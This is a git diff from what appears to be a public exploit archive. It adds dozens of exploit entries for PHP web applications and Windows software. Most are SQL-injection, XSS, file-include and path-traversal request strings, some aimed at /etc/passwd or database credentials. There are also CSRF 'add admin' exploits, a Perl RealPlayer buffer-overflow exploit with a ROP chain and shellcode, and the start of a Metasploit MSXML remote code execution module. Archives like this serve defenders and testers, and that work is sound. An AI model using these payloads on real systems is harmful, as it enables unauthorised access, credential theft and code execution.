succeeded! You have Full access now!'); +} +?> + diff --git a/platforms/php/webapps/30892.txt b/platforms/php/webapps/30892.txt new file mode 100755 index 000000000..57267cc76 --- /dev/null +++ b/platforms/php/webapps/30892.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/26896/info + +Neuron News is prone to multiple input-validation vulnerabilities, including an SQL-injection issue and two cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect Neuron News 1.0; other versions may also be affected. + +http://www.example.com/patch/?q='/**/union/**/select/**/1,2,adminmail,4,id/**/from/**/neuronnews_configuration/* +http://www.example.com/patch/?q=viewtopic&topic= +http://www.example.com/patch/?q=newsarchive&newsyear= +http://www.example.com/patch/?q=newsarchive&newsyear=&newsmonth= diff --git a/platforms/php/webapps/30893.txt b/platforms/php/webapps/30893.txt new file mode 100755 index 000000000..1dbe00bb4 --- /dev/null +++ b/platforms/php/webapps/30893.txt @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/26898/info + +PHP Security Framework is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and remote file-include issues. + +A successful exploit may allow an attacker to execute malicious code within the context of the webserver process, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +PHP Security Framework Beta 1 is vulnerable; other versions may also be affected. + +http://www.example.com/PSF/lib/base.inc.php?MODEL_DIR=http://www.example2.com/ +http://www.example.com/PSF/lib/base.inc.php?DAO_DIR=/etc/passwd%00 + +POST http://www.example.com/PSF/index.php?page=authentification HTTP/1.1\r\n +Host: localhost\r\n +Connection: keep-alive\r\n +Content-Type: application/x-www-form-urlencoded\r\n +Content-Length: \r\n\r\n +username=8%27+union+select+CHR%2856%29%2CCHR%2857%29%2CCHR%2857%29%2CCHR%2857%29+FROM+psf_administrator-----------&password=9&page=authentification&button=Log+in\r\n\r\n + +SQL-query: select * from psf_administrator WHERE username='8\\\\\\\\\\\\\\\'union select CHR(56),CHR(57),CHR(57),CHR(57) FROM psf_administrator-----------' \ No newline at end of file diff --git a/platforms/php/webapps/30899.txt b/platforms/php/webapps/30899.txt new file mode 100755 index 000000000..21a9ac115 --- /dev/null +++ b/platforms/php/webapps/30899.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26922/info + +Mambo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Mambo 4.6.2 is vulnerable; other versions may also be affected. + +http://localhost/mambo/http://localhost/index.php?option=com_frontpage&Itemid=>"> http://localhost/index.php?option=>">&Itemid=1 \ No newline at end of file diff --git a/platforms/php/webapps/30909.html b/platforms/php/webapps/30909.html new file mode 100755 index 000000000..f90aba609 --- /dev/null +++ b/platforms/php/webapps/30909.html @@ -0,0 +1,36 @@ +Auto Classifieds Script v2.0 - CSRF Vulnerabilty [Add Admin] +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : +http://www.phpjabbers.com/preview/auto-classifieds-script/ + +#################################################################### + +===[ Exploit ]=== + +Cross Site Request Forgery +=========================== + +[Add Admin] + + + +
+ + + + + + +
+ + + + + +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/30910.txt b/platforms/php/webapps/30910.txt new file mode 100755 index 000000000..63da7785f --- /dev/null +++ b/platforms/php/webapps/30910.txt @@ -0,0 +1,83 @@ +Job Listing Script - Multiple Vulnerabilties +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/preview/job-listing-script/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Request Forgery +============================== + +[Change Username/Password Admin] + + + +
+ + + + + + + + + + + + +
+ + + + +[2] Multiple Cross Site Scripting +================================== + +# CSRF with XSS Exploit: + +I. Xss In Categories + + + +
+ + +
+ + + +II. Xss In Type + + + +
+ + +
+ + + +III. Xss In Country + + + +
+ + +
+ + +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/30911.txt b/platforms/php/webapps/30911.txt new file mode 100755 index 000000000..4d251457c --- /dev/null +++ b/platforms/php/webapps/30911.txt @@ -0,0 +1,64 @@ +Appointment Scheduler V2.0 - Multiple Vulnerabilities +========================================================================= + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : http://www.phpjabbers.com/appointment-scheduler/ +#################################################################### + +===[ Exploit ]=== + +[1] Cross Site Scripting +========================= + +# CSRF with XSS Exploit: + + + + +
+ + + + + + + + + +
+ + + + +[2] Cross Site Request Forgery +=============================== + +[Add Admin] + + + +
+ + + + + + +
+ + + +
+ + + + + + + +
+ + + + +II. Non-Persistent XSS + +www.site.com/index.php?controller=AdminBookings&action=index&p_date=XSS + +www.site.com/index.php?controller=AdminBookings&action=index&p_date= +">"/> + + + +[2] Cross Site Request Forgery +=============================== + +[Change Username/Password Admin] + + + +
+ + + + + + + + +
+ + + +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/30913.txt b/platforms/php/webapps/30913.txt new file mode 100755 index 000000000..2ba6ac76f --- /dev/null +++ b/platforms/php/webapps/30913.txt @@ -0,0 +1,93 @@ +Event Booking Calendar V2.0 - Multiple Vulnerabilities +==================================================================== + +#################################################################### +.:. Author : HackXBack +.:. Contact : h-b@usa.com +.:. Home : http://www.iphobos.com/blog/ +.:. Script : www.phpjabbers.com/event-booking-calendar/ +.:. Dork : inurl:"load-calendar.php" +#################################################################### + +===[ Exploit ]=== + +[1] multiple Blind Ijection +============================ + +www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1[inject] +www.site.com/script/load-calendar.php?cid=1[inject] + +www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=1 +>>True +www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+1=2 +>>False + +www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=5 +>>True +www.site.com/script/load-calendar.php?view=1&month=6&year=2013&cid=1+and+substring(@@version,1,1)=4 +>>False + + + +[2] Cross Site Request Forgery +============================== + +[Change Username/Password Admin] + + + +
+ + + + +
+ + + + +[3] Multiple Cross Site Scripting +================================= + +# CSRF with XSS Exploit: + +I. Xss In Event + + + + +
+ + + + + + + + + + + + +
+ + + +II. Xss In Categories + + + + +
+ + +
+ + + +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/30916.txt b/platforms/php/webapps/30916.txt new file mode 100755 index 000000000..9e44f4e71 --- /dev/null +++ b/platforms/php/webapps/30916.txt @@ -0,0 +1,59 @@ +Advisory ID: HTB23192 +Product: Burden +Vendor: Josh Fradley +Vulnerable Version(s): 1.8 and probably prior +Tested Version: 1.8 +Advisory Publication: December 18, 2013 [without technical details] +Vendor Notification: December 18, 2013 +Vendor Patch: December 18, 2013 +Public Disclosure: January 8, 2014 +Vulnerability Type: Improper Authentication [CWE-287] +CVE Reference: CVE-2013-7137 +Risk Level: High +CVSSv2 Base Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) +Solution Status: Fixed by Vendor +Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) + +----------------------------------------------------------------------------------------------- + +Advisory Details: + +High-Tech Bridge Security Research Lab discovered vulnerability in application authentication mechanism in Burden, which can be exploited by remote non-authenticated attacker to gain administrative access to the vulnerable application. + + +1) Improper Authentication in Burden: CVE-2013-7137 + +The vulnerability exists due to insufficient authentication when handling "burden_user_rememberme" cookie parameter. A remote unauthenticated user can set "burden_user_rememberme" cookie to "1" and gain administrative access to the application. + +The exploitation example below shows HTTP GET request that grants administrative privileges to the user: + + +GET /login.php HTTP/1.1 + +Cookie: burden_user_rememberme=1; + + +The cookie can be also changed using a browser plugin such as Firebug for FireFox. + +----------------------------------------------------------------------------------------------- + +Solution: + +Update to Burden 1.8.1 + +More Information: +https://github.com/joshf/Burden/releases/tag/1.8.1 + +----------------------------------------------------------------------------------------------- + +References: + +[1] High-Tech Bridge Advisory HTB23192 - https://www.htbridge.com/advisory/HTB23192 - Improper Authentication in Burden. +[2] Burden - https://github.com/joshf - Burden is a full featured task management app written in PHP. +[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. +[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. +[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. + +----------------------------------------------------------------------------------------------- + +Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \ No newline at end of file diff --git a/platforms/php/webapps/30917.txt b/platforms/php/webapps/30917.txt new file mode 100755 index 000000000..27cd93f71 --- /dev/null +++ b/platforms/php/webapps/30917.txt @@ -0,0 +1,62 @@ +Advisory ID: HTB23191 +Product: Horizon QCMS +Vendor: Horizon QCMS +Vulnerable Version(s): 4.0 and probably prior +Tested Version: 4.0 +Advisory Publication: December 18, 2013 [without technical details] +Vendor Notification: December 18, 2013 +Vendor Patch: December 25, 2013 +Public Disclosure: January 8, 2014 +Vulnerability Type: Path Traversal [CWE-22], SQL Injection [CWE-89] +CVE References: CVE-2013-7138, CVE-2013-7139 +Risk Level: High +CVSSv2 Base Scores: 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) +Solution Status: Fixed by Vendor +Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) + +----------------------------------------------------------------------------------------------- + +Advisory Details: + +High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Horizon QCMS, which can be exploited to read contents of arbitrary files and perform SQL Injection attacks. + + +1) Path Traversal in Horizon QCMS: CVE-2013-7138 + +The vulnerability exists due to insufficient filtration of "start" HTTP GET parameter passed to "/lib/functions/d-load.php" script before using it in PHP "fopen()" function. A remote attacker can read contents of arbitrary files on the target system with privileges of the web server. + +The exploitation example below will display content of "/config.php" file that contains MySQL database login credentials: + +http://[host]/lib/functions/d-load.php?start=../../config.php + + +2) SQL Injection in Horizon QCMS: CVE-2013-7139 + +The vulnerability exists due to insufficient validation of "category" HTTP POST parameter passed to "/download.php" script. A remote unauthenticated attacker can execute arbitrary SQL commands in application's database. + +The exploitation example below displays version of MySQL server: + +http://[host]/download.php?category=%27%20union%20select%201,2,version(),4,5,6%20--%202 + +----------------------------------------------------------------------------------------------- + +Solution: + +Apply security patch for Horizon 4.0 + +More Information: +http://sourceforge.net/projects/hnqcms/files/patches/ + +----------------------------------------------------------------------------------------------- + +References: + +[1] High-Tech Bridge Advisory HTB23191 - https://www.htbridge.com/advisory/HTB23191 - Multiple vulnerabilities in Horizon QCMS. +[2] Horizon QCMS - http://www.hnqcms.com/ - An open source Horizon Quick Content Managment System with PHP and MySQL support. +[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. +[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. +[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing. + +----------------------------------------------------------------------------------------------- + +Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \ No newline at end of file diff --git a/platforms/php/webapps/30918.txt b/platforms/php/webapps/30918.txt new file mode 100755 index 000000000..077afc58b --- /dev/null +++ b/platforms/php/webapps/30918.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/26961/info + +iSupport is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +Exploiting this issue may allow an unauthorized user to view files and execute local scripts. + +This issue affects iSupport 1.8; other versions may also be affected. + + +http://www.example.com/iSupport/index.php?include_file=[local file] +http://www.example.com/helpdesk/index.php?include_file=../../../../../proc/self/environ +http://www.example.com/helpdesk/index.php?include_file=../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/30921.txt b/platforms/php/webapps/30921.txt new file mode 100755 index 000000000..5d5bfc8ea --- /dev/null +++ b/platforms/php/webapps/30921.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26977/info + +MRBS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +This issue was previously documented as a vulnerability in Moodle. Further reports indicate this issue affects MRBS, and the MRBS module for Moodle. + +http://www.example.com/PATH/moodle/ing/blocks/mrbs/code/web/view_entry.php?id=2000%20UNION%20SELECT%20username,id,id,id,id,id,id,id,id,id,id,id%20FROM%20mdl_user%20WHERE%20id=[ID]&day=27&month=10&year=2007 \ No newline at end of file diff --git a/platforms/php/webapps/30923.txt b/platforms/php/webapps/30923.txt new file mode 100755 index 000000000..e7af804c4 --- /dev/null +++ b/platforms/php/webapps/30923.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/26987/info + +MyBlog is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +http://www.example.com/[path]/games.php?id=[Sh3ll-Script] \ No newline at end of file diff --git a/platforms/php/webapps/30924.txt b/platforms/php/webapps/30924.txt new file mode 100755 index 000000000..eabd18af7 --- /dev/null +++ b/platforms/php/webapps/30924.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26992/info + +Dokeos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect Dokeos 1.8.4 and earlier versions. + +http://www.example.com/main/forum/viewthread.php?forum=XSS \ No newline at end of file diff --git a/platforms/php/webapps/30925.txt b/platforms/php/webapps/30925.txt new file mode 100755 index 000000000..3a7802210 --- /dev/null +++ b/platforms/php/webapps/30925.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/26992/info + +Dokeos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect Dokeos 1.8.4 and earlier versions. + +http://www.example.com/main/forum/viewforum.php?cidReq=[Forum-ID]&forum=XSS diff --git a/platforms/php/webapps/30926.txt b/platforms/php/webapps/30926.txt new file mode 100755 index 000000000..80fa38b76 --- /dev/null +++ b/platforms/php/webapps/30926.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/26992/info + +Dokeos is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +These issues affect Dokeos 1.8.4 and earlier versions. + +http://www.example.com/main/work/work.php?cidReq=[Forum-ID]&curdirpath=/&display_upload_form=true&origin=XSS + diff --git a/platforms/php/webapps/30927.txt b/platforms/php/webapps/30927.txt new file mode 100755 index 000000000..a9da16fe8 --- /dev/null +++ b/platforms/php/webapps/30927.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/26998/info + +ThemeSiteScript is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. + +ThemeSiteScript 1.0 is reported vulnerable; other versions may be affected as well. + +http://www.example.com/admin/index.php?loadadminpage=http://www.example2.com + + diff --git a/platforms/php/webapps/30929.txt b/platforms/php/webapps/30929.txt new file mode 100755 index 000000000..0a70f5894 --- /dev/null +++ b/platforms/php/webapps/30929.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27003/info + +Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/logaholic/update.php?conf=nameofprofile&page=SQL INjection \ No newline at end of file diff --git a/platforms/php/webapps/30930.txt b/platforms/php/webapps/30930.txt new file mode 100755 index 000000000..fd5563139 --- /dev/null +++ b/platforms/php/webapps/30930.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27003/info + +Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/logaholic/index.php?conf=nameofprofile&from=SQL INJECTION \ No newline at end of file diff --git a/platforms/php/webapps/30931.txt b/platforms/php/webapps/30931.txt new file mode 100755 index 000000000..946e69f93 --- /dev/null +++ b/platforms/php/webapps/30931.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/27003/info + +Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?conf= \ No newline at end of file diff --git a/platforms/php/webapps/30932.txt b/platforms/php/webapps/30932.txt new file mode 100755 index 000000000..40fbf78e9 --- /dev/null +++ b/platforms/php/webapps/30932.txt @@ -0,0 +1,8 @@ +source: http://www.securityfocus.com/bid/27003/info + +Logaholic is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues, a cross-site scripting issue, and an HTML-injection issue. The issues occur because the application fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +POST variable "newconfname" in profiles.php?conf=nameofprofile to +>">alert(xss)%3B in /logaholic/profiles.php \ No newline at end of file diff --git a/platforms/php/webapps/30937.txt b/platforms/php/webapps/30937.txt new file mode 100755 index 000000000..f51a84228 --- /dev/null +++ b/platforms/php/webapps/30937.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/27027/info + +Limbo CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +Limbo CMS 1.0.4.2 is vulnerable; other versions may also be affected. + +http://www.example.com/admin.php?com_option=>"'> \ No newline at end of file diff --git a/platforms/windows/dos/30773.txt b/platforms/windows/dos/30773.txt new file mode 100755 index 000000000..4ada4cfa3 --- /dev/null +++ b/platforms/windows/dos/30773.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/26468/info + +Microsoft Jet Database Engine is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data. + +Remote attackers can exploit this issue to execute arbitrary machine code in the context of a user running the application. Successful exploits will compromise the affected application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions. + +NOTE: Further details report that attackers are using malicious Word files to load specially crafted MDB files. Microsoft has released a knowledge base article (950627) documenting this attack vector. + +This issue does not affect Windows Server 2003 Service Pack 2, Windows XP Service Pack 3, Windows XP x64 edition Server Pack 2, Windows Vista, Windows Vista Service Pack 1 and Windows Server 2008 because they run a version of the Jet Database Engine that isn't vulnerable. + +This issue does affect the Jet Database Engine, Microsoft Word 2000 Service Pack 3, Microsoft Word 2002 Service Pack 3, Microsoft Word 2003 Service Pack 2, Microsoft Word 2003 Service Pack 3, Microsoft Word 2007, and Microsoft Word 2007 Service Pack 1 on Microsoft Windows 2000, Windows XP, or Windows Server 2003 Service Pack 1. + +http://www.exploit-db.com/sploits/30773.mdb \ No newline at end of file diff --git a/platforms/windows/dos/30936.html b/platforms/windows/dos/30936.html new file mode 100755 index 000000000..e90004c67 --- /dev/null +++ b/platforms/windows/dos/30936.html @@ -0,0 +1,40 @@ +source: http://www.securityfocus.com/bid/27026/info + +AOL Picture Editor 'YGPPicEdit.dll' ActiveX control is prone to multiple vulnerabilities that attackers can exploit to crash the application. The issues stem from various buffer-overflow conditions. + +An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious HTML page. + +Successfully exploiting these issues may allow remote attackers to crash the affected application using the ActiveX control (typically Internet Explorer), denying service to legitimate users. Reports indicate that this issue may not be exploited to execute arbitrary code. + +AOL Picture Editor 'YGPPicEdit.dll' 9.5.1.8 is vulnerable; other versions may also be affected. + + + + + + + + + + + + diff --git a/platforms/windows/local/30468.pl b/platforms/windows/local/30468.pl index 8249cef48..abd6283ac 100755 --- a/platforms/windows/local/30468.pl +++ b/platforms/windows/local/30468.pl @@ -1,14 +1,14 @@ -?#!/usr/bin/perl +#!/usr/bin/perl #-----------------------------------------------------------------------------# # Exploit Title: RealNetworks RealPlayer Version Attribute Buffer Overflow # -# Date: Dec 20, 2013 # +# Date: Dec 20 2013 # # Exploit Author: Gabor Seljan # # Vendor Homepage: http://www.real.com # # Software Link: http://www.oldapps.com/real.php?old_real_player=12814 # -# Version: 16.0.3.51 and 16.0.2.32 # -# Tested on: Windows XP SP2/SP3 (NX) # -# CVE: CVE-2013-6877 # +# Version: 16.0.3.51, 16.0.2.32 # +# Tested on: Windows XP SP2/SP3 (DEP Bypass) # +# CVE: CVE-2013-7260 # #-----------------------------------------------------------------------------# use strict; @@ -16,14 +16,34 @@ use warnings; my $filename = "sploit.rmp"; -my $open = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22"; -my $close = "\x22\x3f\x3e\x3b"; -my $junk1 = "\x41" x 2540; # Offset to SEH when opening via click -my $junk2 = "\x41" x 10514; # Offset to SEH when opening via menu -my $nSEH = "\xeb\x06\x90\x90"; # Overwrite next SEH with JMP (6 bytes) -my $SEH = pack('V',0x641930c8); # POP POP RET from rpap3260.dll (16.0.3.51) -#my $SEH = pack('V',0x63A630B8); # POP POP RET from rpap3260.dll (16.0.2.32) -my $junk3 = "\x41" x 17000; # Generate exception +my $junk1 = "\x41" x 44; # Offset to ROP + Shellcode +my $junk2 = "\x43" x 1858; # Offset to SEH when opening via click (2540) +my $junk3 = "\x44" x 11052; # Offset to SEH when opening via menu (13600) +my $nSEH = "\xeb\x06\x90\x90"; # Overwrite next SEH with JMP (6 bytes) +my $SEH = pack('V',0x5acceecd); # ADD ESP,428 # RETN 10 [mswmdm.dll] +my $junk4 = "\x45" x 17000; # Generate exception + +my $rop_gadgets = ""; + $rop_gadgets .= pack('V',0x77c1c552); # RETN (ROP NOP) [msvcrt.dll] + $rop_gadgets .= "\x42" x 16; # JUNK + $rop_gadgets .= pack('V',0x77c21d16); # POP EAX # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c11120); # &VirtualProtect() [IAT msvcrt.dll] + $rop_gadgets .= pack('V',0x77c1bb36); # POP EBP # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c20497); # skip 4 bytes [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c2362c); # POP EBX # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x0000095c); # 0x0000095C-> EBX + $rop_gadgets .= pack('V',0x77c4cb29); # POP EDX # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x00000040); # 0x00000040-> EDX + $rop_gadgets .= pack('V',0x77c1f519); # POP ECX # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77C5D305); # &Writable location [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c23b47); # POP EDI # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c47a42); # RETN (ROP NOP) [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c2ed13); # POP ESI # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c2aacc); # JMP [EAX] [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c12df9); # PUSHAD # RETN [msvcrt.dll] + $rop_gadgets .= pack('V',0x77c35459); # PUSH ESP # RETN [msvcrt.dll] + +my $nops = "\x90" x 16; # msfpayload windows/exec CMD=calc.exe my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1". @@ -54,14 +74,14 @@ my $shellcode = "\xb8\x2f\x9e\xa9\x6f\xdb\xdc\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1". "\xb2\x73\x03\xf8\xb4\x7e\x1a\xfd\xb9\x37\x42\x4b\xb3\x39\xf9\x25\xb5\xa8\x3d". "\xba\x92\x40\x4a\xb6\x24\x79\x27\x0c\xbb\x88\xfc\x3c\x35\x97\x4f\x9b\x47\x78". "\x15\x41\x91\x66\xb1\x74\x0d\xbf\xb8\x90\x28\xd4\x2a\xf5\x3f\x43\x93\x98\x2c". -"\x1c\xa9\x2f\x48\x9f\x67\x49\x3b\xd6"; +"\x1c\xa9\x2f\x48\x9f\x67\x49\x3b\xd6"; -my $evil = $nSEH.$SEH.$shellcode; +my $evil = $rop_gadgets.$nops.$shellcode; -my $sploit = $open.$junk1.$evil.$junk2.$evil.$junk3.$close; +my $sploit = $junk1.$evil.$junk2.$nSEH.$SEH.$junk3.$nSEH.$SEH.$junk4; open(FILE, ">$filename") || die "[-]Error:\n$!\n"; -print FILE $sploit; +print FILE ""; close(FILE); print "Exploit file created successfully [$filename]!\n"; \ No newline at end of file diff --git a/platforms/windows/remote/19186.rb b/platforms/windows/remote/19186.rb index 35eefdfbe..3e4a1c0bd 100755 --- a/platforms/windows/remote/19186.rb +++ b/platforms/windows/remote/19186.rb @@ -1,165 +1,387 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GoodRanking - include Msf::Exploit::Remote::HttpServer::HTML - include Msf::Exploit::Remote::BrowserAutopwn - autopwn_info({ - :ua_name => HttpClients::IE, - :ua_minver => "6.0", - :ua_maxver => "7.0", - :javascript => true, - :os_name => OperatingSystems::WINDOWS, - :classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}", - :method => "definition", - :rank => NormalRanking - }) + include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::RopDb + include Msf::Exploit::Remote::BrowserAutopwn + autopwn_info({ + :ua_name => HttpClients::IE, + :ua_minver => "6.0", + :ua_maxver => "9.0", + :javascript => true, + :os_name => OperatingSystems::WINDOWS, + :classid => "{f6D90f11-9c73-11d3-b32e-00C04f990bb4}", + :method => "definition", + :rank => GoodRanking + }) - def initialize(info={}) - super(update_info(info, - 'Name' => "Microsoft XML Core Services MSXML Uninitialized Memory Corruption", - 'Description' => %q{ - This module exploits a memory corruption flaw in Microsoft XML Core Services - when trying to access an uninitialized Node with the getDefinition API, which - may corrupt memory allowing remote code execution. At the moment, this module - only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3. - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'sinn3r', # Metasploit module - 'juan vazquez' # Metasploit module - ], - 'References' => - [ - [ 'CVE', '2012-1889' ], - [ 'OSVDB', '82873'], - [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2719615' ], - [ 'URL', 'http://www.zdnet.com/blog/security/state-sponsored-attackers-using-ie-zero-day-to-hijack-gmail-accounts/12462' ] - ], - 'Payload' => - { - 'BadChars' => "\x00", - 'Space' => 1024 - }, - 'DefaultOptions' => - { - 'ExitFunction' => "none", - 'InitialAutoRunScript' => 'migrate -f' - }, - 'Platform' => 'win', - 'Targets' => - [ - # msxml3.dll 8.90.1101.0 - [ 'Automatic', {} ], - [ 'IE 6 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ], - [ 'IE 7 on Windows XP SP3', { 'Offset' => '0x800 - code.length' } ] - ], - 'Privileged' => false, - 'DisclosureDate' => "Jun 12 2012", - 'DefaultTarget' => 0)) + def initialize(info={}) + super(update_info(info, + 'Name' => "MS12-043 Microsoft XML Core Services MSXML Uninitialized Memory Corruption", + 'Description' => %q{ + This module exploits a memory corruption flaw in Microsoft XML Core Services + when trying to access an uninitialized Node with the getDefinition API, which + may corrupt memory allowing remote code execution. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'inking26', # Reliable exploitation + 'binjo', # Metasploit module + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2012-1889' ], + [ 'BID', '53934' 